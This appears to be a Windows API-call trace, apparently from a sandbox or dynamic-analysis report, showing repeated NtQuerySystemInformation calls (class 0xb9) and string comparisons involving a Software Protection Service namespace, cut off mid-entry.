[0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.132] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.145] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d700, Length=0x28, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d620, Length=0x20, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d6e0, Length=0x20, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.183] NtQuerySystemInformation (SystemInformationClass=0xb9, 